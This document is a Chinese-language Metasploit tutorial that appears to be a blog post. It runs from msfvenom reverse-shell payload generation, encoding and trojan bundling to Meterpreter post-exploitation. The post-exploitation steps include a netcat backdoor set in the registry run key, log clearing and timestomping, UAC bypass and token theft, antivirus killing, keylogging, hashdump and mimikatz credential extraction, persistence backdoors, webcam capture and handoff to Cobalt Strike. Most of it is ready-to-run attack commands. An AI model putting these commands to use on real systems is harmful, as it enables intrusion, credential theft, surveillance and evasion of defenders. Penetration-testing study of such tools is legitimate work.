Metasploit基础


Metasploit使用的数据库是posetpresql,在msf5之前启动的话需要安装数据库格式化数据库,设置用户和密码去进行连接,而在msf5之后不需要在这样操作,只需在kali的命令行中使用msfdb init就可以初始化并开启msf的数据库,然后在输入msfconsole就可以启动msf,进入之后我们可以使用db_status来进行查看连接数据库的状态。除此在外我们还可以使用kage实现界面话。


1.msf目录结构


在kali当中默认安装,文件路径是在/usr/share/metasploit-framework/中,在该目录下有以下几个比较重要的文件夹:


data:目录当中是msf当中一些可编辑的文件,如字典

documentation:文档目录是对工具的介绍

external:源代码和第三方库

lib:(静态链接库)目录:里边是msf的代码

modules:模块目录装,有msf当中的exp,payload等内容

plugins:可加载的插件

scripts:meterpreter和其它脚本

tools:各种命令行工具


其中modules模块包含有msf的核心文件


auxiliary #漏洞辅助模块一般是没有攻击载荷的漏洞攻击

encoders #码器模块

evasion #简单的反杀模块

exploits #渗透攻击模块

nops #空指令模块

payloads #漏洞负载模块

2. msf的使用

2.1 msf基础使用命令:

show 模块名:进行罗列模块

search 模块关键字:搜索关键字(一般都是我们查找某个漏洞的exp时会使用search进行搜索关键词)

出现的开头为Auxiliary的模块为扫描模块,exploit为执行任务模块

use 模块名:使用该模块

back:返回上一级

info:在使用模块之后可以使用info来查看模块信息,查看的话主要查看这一部分

show options(显示的是info当中的一部分):查看模块配置 去设置回显当中required的配置

set:使用set命令来设置required当中需要配置的信息

设置之后我们在使用show options之后我们可以看到rhosts已经变成了我们设置后的值

exploit:来执行

jobs:查看后台工作

kill 工作ID号:杀死进程

2.2 msf扫描脚本


在下方目录下是扫描脚本

/usr/share/metasploit-framework/modules/auxiliary/scanner/


use auxiliary/scanner/discovery/arp_sweep     利用arp协议进行发现主机

use auxiliary/scanner/discovery/udp_sweep 可以回显我们存活主机的计算机名,用户

use auxiliary/scanner/portscan/tcp 端口扫描模块

use auxiliary/scanner/http/dir_scanner

use auxiliary/scanner/http/jboss_vulnscan

use auxiliary/scanner/mssql/mssql_login

use auxiliary/scanner/mysql/mysql_version

use auxiliary/scanner/oracle/oracle_login

3. msfvenom


msfvenom是msfpayload和msfencode的组合,它用于生成有效载荷(payload)并进行编码

在kali当中直接输入msfvenom就可以直接运行msfvenom

参考:https://www.cyberpratibha.com/blog/msfvenom-replacement-of-msfpayload-and-msfencode-full-guide/


3.1 msfvenom使用:

1、msfvenom常用参数及说明

MsfVenom - 是msf独立有效载荷生成器,也是msfpayload和msfencode的替代品
用法: msfvenom [options] <var=val>
示例: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

常用可用参数:
-l, --list 列出所有模块,可指定payload,encoders, nops, platforms, archs, encrypt, formats 示例:msfvenom -l payload

-p, --payload 指定payload
--list-options 查看指定的payload支持什么平台、有哪些选项可以设置
msfvenom -p windows/meterpreter/reverse_tcp --list-options
-f, --format 指定输出payload的格式,示例 -f exe
-e, --encoder 指定要使用的编码器,示例:-e sx86/shikata_ga_nai
-o, --out 将生成的有效载荷保存到指定文件中
-b, --bad-chars 要避免的坏字符 示例:-b '\x00\xff'
-n, --nopsled 将指定大小的nopled添加到有效载荷上
-s, --space 指定产生有效载荷的最大值,就是生成的文件大小
-i, --iterations 指定对有效载荷的编码次数,一般不要超过20
-c, --add-code 指定一个附加的win32 shellcode文件
-a, <x64/x86> 指定架构,一般需要先使用-platform检查msf中的可用平台
-x 指定一个文件,将pauload添加进去【用于木马捆绑】,示例:-x puttyel.exe
-k 该选项可以保留模版原来的功能,将payload作为一个新的线程来注入,但不能保证可以用在所有可执行程序上
-platform 查看msf中的可用平台 示例:msfvenom -l platforms
-h, --help 帮助信息


payload有两种类型:bind类型(正向)和reverse类型(反向)

bind类型:即正向连接,一般使用在目标机器处于内网当中,不能直接连通外网,也不能通过其他机器进行连接,此时就需要目标机器通过正向的payload打开一个端口,让攻击者去连接目标机器打开的这个端口,从而建立通信。

reverse类型:即反向连接,指的是攻击者的机器上打开了一个端口,在目标机器上运行反向payload来连接攻击机的端口,从而用于连接,常用于边线服务器的上线。【大多数情况下用tcp协议的payload】


2、msfvenom构造payload【基本使用】

windows下:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.132【kali地址】 LPORT=4444   -f exe >1.exe

linux下:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.10.132 LPORT=4444 -f elf>1.elf

在生成payload之后我们在msf当中使用时一般注重一下的步骤:

use exploit/multi/handler 【使用监听模块】

set payload windows/x64/meterpreter_reverse_tcp 【设置的payload必须和msfvenom当中生的payload是同一个模块】

set lhost 192.168.10.132【因为使用的是reverse模板,这里设置攻击机的ip,用于监听shell连接】

set lport 4444【因为使用的是reverse模板,这里设置攻击机的port,用于监听shell连接】

exploit -j 【-j为后台运行】


把msfvenom生成的payload上传至目标机器并运行,然后我们就可以获取一个shell,如果是后台运行,通过sessions -l 可以查看后台的shell


3、msfvenom进阶

(1)指定编码,指定编码次数

msfvenom --list encoders:查看msfvenom自带的编码器,可以看到x86/shikata_ga_nai编码器是评级为x86里面唯一excellent的,所以也是编码中使用最多的

msfvenom -p windows/meterpreter/reverse_tcp_rc4 LHOST=172.16.1.13 LPORT=4444 -e x86/shikata_ga_nai  -i 15 - f exe -o mazi.exe
(2)木马捆绑
msfvenom -p windows/meterpreter/reverse_tcp_rc4 LHOST=172.16.1.13 LPORT=4444 -e x86/shikata_ga_nai -x puttyel.exe -i 15 - f exe -o puttyel_master.exe

4.Meterprete

4.1 Meterprete基础操作:

1、基本命令

background:在进入到Meterprete中之后我们可以使用此命令返回到msf当中

sessions -l:查看所有会话信息

sessions -i 会话ID号:与指定的会话进行交互

quit / exit:关闭当前会话

idletime:查看目标服务器空闲时间

shell:进入对方的windows终端行,可以执行一些windows下的命令,如果出现乱码我们可以使用chcp 编码代表字母 命令来改变编码方式


65001 UTF-8代码页

950繁体中文

936简体中文默认的GBK

437 MS-DOS美国英语


timestomp:伪造时间信息


timestomp -v C:/phpStudy/manual.chm #查看时间戳

timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt


getsystem:尝试提权方式

clearev:清除windows中的应用程序日志、系统日志、安全日志,需要system权限,清理后会有一个日志清除记录

2、文件系统命令

search: 查找执行文件


search -f 1.txt

search -f *.exe


pwd | getwd:查看目标当前目录的位置

ls:列出目标当前目录下的文件

cd:切换目标机的执行目录

rm:删除目标机指定文件

mkdir:在目标机创建目录(只能在当前目录下创建文件夹)

rmdir:删除目标机指定目录(只能删除当前目录下的文件夹)

getlwd | lpwd:查看本地(攻击机)的当前目录(msf的目录)

lcd:切换本地(攻击机)的执行目录

lls:列出本地(攻击机)当前目录下的文件

download 文件名:将目标文件下载到本地

upload 文件名:上传本地目录到目标主机

3、网络命令

ipconfig / ifconfig:查看网络接口信息

netstat -ano:查看端口连接信息

route:显示路由信息

netstat:查看网络连接情况

arp:查看arp信息

getproxy:查看代理信息

portfwd 端口转发


portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口
rdesktop 127.0.0.1:6666 #kali远程桌面使用6666端口


run autoroute 路由相关


run autoroute -s 10.0.0.0/24 添加路由

run autoroute -s 10.0.0.0 -n 255.0.0.0 -s 参数为网关 -n 参数为只掩码

run autoroute -p 查看路由


添加路由实战案例:


meterpreter > run autoroute -s 192.168.105.0 -n 255.255.255.0 #目标机的网关和掩码

msf6 > use auxiliary/server/socks_proxy #msf6使用sock5代理

msf6 auxiliary(server/socks_proxy) > set srvhost 127.0.0.1 #设置代理地址,一般设置攻击机本机

msf6 auxiliary(server/socks_proxy) > set srvport 60010 #设置一个可用的端口

#设置proxychains使用即可

vim /etc/proxychains.conf

#将最后一行改为自己添加的路由信息如
socks5 127.0.0.1 60010


内网渗透


run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24 #扫描整个段存活主机

run post/windows/gather/enum_computers:枚举我们域内的主机


4、系统命令

execute :在目标执行命令的功能,可使用execute -h来获取参数帮助


execute -H -i -f cmd.exe #创建新进程cmd.exe,-H不可见,-i交互 -m参数是在内存中运行


ps:列出目标进程

getuid:查看当前用户的身份

getprivs:查看当前用户的权限

getpid:查看meterpreter shell进程pid信息

migrate PID:进程迁移(隐蔽我们执行的exe进程或者是获取其他的一些权限,这里需要meterpreter shell的权限要高于等于要迁移的进程权限)


getpid #获取当前进程的pid

ps 查看系统中运行进程

migrate #将meterpreter会话迁移到指定的pid进行中


sysinfo:查看目标信息

kill:杀死目标进程

shutdown:关机

reboot:重启

4.2 后渗透模块使用

1、信息收集

如下为常用且高效的信息收集模块

/usr/share/metasploit-framework/modules/post/windows/gather
/usr/share/metasploit-framework/modules/post/linux/gather

解释:
msf > run post/windows/gather/checkvm #是否虚拟机
msf > run post/linux/gather/checkvm #是否虚拟机
msf > run post/windows/gather/forensics/enum_drives #查看分区
msf > run post/windows/gather/enum_applications #获取安装软件信息
msf > run post/windows/gather/dumplinks #获取最近的文件操作
msf > run post/windows/gather/enum_ie #获取IE缓存
msf > run post/windows/gather/enum_chrome #获取Chrome缓存
msf > run post/windows/gather/enum_patches #补丁信息
msf > run post/windows/gather/enum_domain #查找域控

2、提权

getsystem

1、getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。
2、getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。
3、Windows服务已启动,导致与命名管道建立连接。
4、该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。

bypassuac

内置多个pypassuac脚本,原理有所不同,使用方法类似,运行后返回一个新的会话,需要再次执行getsystem获取系统权限,如:

use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask

示例:

msf > use exploit/windows/local/bypassuac
msf > set SESSION 5 #选择当前会话
msf > run

大部分情况下直接使用​​getsystem​​是很难提权的,会提示管道内存问题、令牌问题、RPCSS变体等阻碍提权,但如果利用bypassuac返回新会话后,提权就会相对容易些

3、内核提权

可先利用​​enum_patches​​模块收集补丁信息,然后查找可用的exploits进行提权,需要退出当前连接

meterpreter > run post/windows/gather/enum_patches  #查看补丁信息
msf > use exploit/windows/.... #利用未打补丁的模块即可
msf > set SESSION 5
msf > exploit

4、远程桌面&截图

enumdesktops    #查看可用的桌面
getdesktop #获取当前meterpreter 关联的桌面
set_desktop #设置meterpreter关联的桌面 -h查看帮助
screenshot #截屏
use espia #使用espia模块截屏 然后输入screengrab
run vnc #使用vnc远程桌面连接,这方法有点问题,上传了exe但是启动不了

5、开启rdp&添加用户

getgui :该指令容易添加失败(有火绒时直接失败)

run getgui -e   #开启远程桌面
run getgui -u anan -p 123@a.com #添加用户
run getgui -f 63389 –e #3389端口转发到63389

enable_edp :该指令在有火绒的情况下能够正常添加用户

run post/windows/manage/enable_rdp  #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123@a.com #添加用户,需要注意密码复杂度
run post/windows/manage/enable_rdp FORWARD=true LPORT=63389 #将3389端口转发到63389

6、键盘记录

keyscan_start    #开始键盘记录
keyscan_dump #导出记录数据
keyscan_stop #结束键盘记录

注意:导出记录的话要在keyscan_stop命令之前,不然结束了就无法导出了

7、注册表操作

注册表参数说明如下

meterpreter > reg -h
Usage: reg [command] [options]
Interact with the target machine's registry.

OPTIONS:

-d <opt> The data to store in the registry value.#注册表中值的数据
-h Help menu.
-k <opt> The registry key path (E.g. HKLM\Software\Foo).#注册表键路径
-r <opt> The remote machine name to connect to (with current process credentials#要连接的远程计算机名称(使用当前进程凭据)
-t <opt> The registry value type (E.g. REG_SZ).#注册表值类型
-v <opt> The registry value name (E.g. Stuff).#注册表键名称
-w Set KEY_WOW64 flag, valid values [32|64].#设置32位注册列表还是64位

COMMANDS:

enumkey Enumerate the supplied registry key [-k <key>]#枚举可获得的键
createkey Create the supplied registry key [-k <key>]#创建提供的注册表项
deletekey Delete the supplied registry key [-k <key>]#删除提供的注册表项
queryclass Queries the class of the supplied key [-k <key>]#查询键值数据
setval Set a registry value [-k <key> -v <val> -d <data>]#设置键值
deleteval Delete the supplied registry value [-k <key> -v <val>]#删除提供的注册表值
queryval Queries the data contents of a value [-k <key> -v <val>]#查询值的数据内容

注册表设置nc后门

upload /root/nc64.exe C://Users//anan//Desktop   #上传nc,前面的是你要上传文件的位置
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run #枚举run下的key
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C://Users//anan//Desktop//nc.exe -Ldp 60011 -e cmd.exe' #设置键值
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc #查看键值

nc -v 192.168.105.131 60011 #攻击者连接nc后门

8、令牌操作

incognito假冒令牌

use incognito        #进入incognito模式
help incognito #查看帮助
list_tokens -u #查看可用的token
impersonate_token 'NT AUTHORITY\SYSTEM' #假冒SYSTEM token,或者用下面的
#impersonate_token NT\ AUTHORITY\\SYSTEM #不加单引号 需使用\\
execute -f cmd.exe -i –t # -t 使用假冒的token执行或者直接shell
rev2self #返回原始token

steal_token窃取令牌

steal_token <pid值>   #从指定进程中窃取token   先ps
drop_token #删除窃取的token

这种方法如果不是SYSTEM权限的话是无法窃取SYSTEM权限的,只能窃取相关的权限

9、关闭杀软

meterpreter> run killav *//这个脚本要小心使用,可能导致目标机器蓝屏死机*

10、hash抓取

hashdump


hashdump 模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限


run hashdump

smart_hashdump


smart_hashdump需要系统权限,该功能更强大,可以导出域内所有用户的hash!!

smart_hashdump还可以配合PSExec模块进行哈希攻击


run windows/gather/smart_hashdump


抓取自动登录用户的密码


run windows/gather/credentials/windows_autologin

kiwi


kiwi模块同时支持32位和64位的系统,但是该模块默认是加载32位的系统,所以如果目标主机是64位系统的话,直接默认加载该模块会导致很多功能无法使用。所以如果目标系统是64位的,则必须先查看系统进程列表,然后将meterpreter进程迁移到一个64位程序的进程中,才能加载kiwi并且查看系统明文。如果目标系统是32位的,则没有这个限制。


meterpreter > load  mimikatz   #如果目标是64位的系统,会报如下错误
.....
[!] Loaded x86 Kiwi on an x64 architecture
.....


如果遇到该报错,则迁移进程到一个64位进程上即可


ps
migrate <64位进程pid>


该功能非常强大,kiwi_cmd命令是包含了mimikatz


creds_all:列举所有凭据
creds_kerberos:列举所有kerberos凭据
creds_msv:列举所有msv凭据
creds_ssp:列举所有ssp凭据
creds_tspkg:列举所有tspkg凭据
creds_wdigest:列举所有wdigest凭据
dcsync:通过DCSync检索用户帐户信息
dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:创建黄金票据
kerberos_ticket_list:列举kerberos票据
kerberos_ticket_purge:清除kerberos票据
kerberos_ticket_use:使用kerberos票据
kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:dump出lsa的SAM
lsa_dump_secrets:dump出lsa的密文
password_change:修改密码
wifi_list:列出当前用户的wifi配置文件
wifi_list_shared:列出共享wifi配置文件/编码

获取明文密码

kiwi_cmd sekurlsa::logonpasswords

11、后门植入


metasploit自带的后门有两种方式启动的,一种是通过启动项启动persistence,一种是通过服务启动metsvc,另外还可以通过persistence_exe自定义后门文件。


persistence启动项后门

OPTIONS:

-A Automatically start a matching exploit/multi/handler to connect to the agent
-h 帮助信息
-i 每次尝试连接之间的间隔(以秒为单位)
-L Location in target host to write payload to, if none %TEMP% will be used.
-p 设置Metasploit的监听端口
-P 设置payload,默认值为windows/MeterMeter/reverse_tcp
-r 设置metasploit的ip(攻击者的ip)
-S 在作为服务启动时自动启动代理(具有system权限)
-T Alternate executable template to use
-U 设置为用户登录时自动启动
-X 设置为系统启动时自动启动


run persistence –h
run persistence -X -i 5 -p 60012 -r 192.168.0.11


persistence启动项后门的缺点是容易被杀毒软件查杀!建议进行如下操作


在C:\Users\anan\AppData\Local\Temp\目录下,上传一个vbs脚本在注册表HKLM\Software\Microsoft\Windows\CurrentVersion\Run\加入开机启动项


metsvc服务后门

-A  自动安装后门
-h 帮助
-r 卸载现有的后门(需要手动删除木马文件)


会自动在C:\Users\anan\AppData\Local\Temp…生成三个文件,并把meterpreter自动放在服务自启中

攻击机使用正向连接,并把连接端口设置为31337,进行连接即可


set payload windows/metsvc_bind_tcp

12、操作目标机模块

run webcam:开启一个摄像头

uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标

uictl disable mouse #禁用鼠标

uictl disable keyboard #禁用键盘

uictl enable mouse #开启鼠标

uictl enable keyboard #开启键盘

webcam_list #查看摄像头

webcam_snap #通过摄像头拍照

webcam_stream #通过摄像头开启视频

5. Armitage

是一个msf的图形 界面话工具但是非常的卡顿不建议使用,在命令行直接使用armitage可以直接使用.

6.msf与cs互相派生会话

6.1 cs派生会话到msf

1、msf配置
use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost xxxxxx (本机ip)

set lport xxxx

exploit
2、cs配置


添加一个监听器,选择Foreign HTTP,设置ip为msf的监听ip,端口设置为msf监听的端口,起一个名称,如cs->msf



然后命令行(beacon)执行:spawn cs->msf #cs->msf为监听器名称


6.2 msf派生会话到cs

1、cs配置

添加一个监听器,选择Beacon HTTP,然后设置相应的监听ip和监听端口即可

2、msf配置
sessions -l    #查看当前存在的session会话

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http

set lhost 192.168.10.13 # 设置cs监听的地址

set lport 60020 # 设置cs监听的端口

set session 1 # 指定要派生的会话

exploit #运行后,cs即可看到上线

原创不易,请勿在授权下随意转发!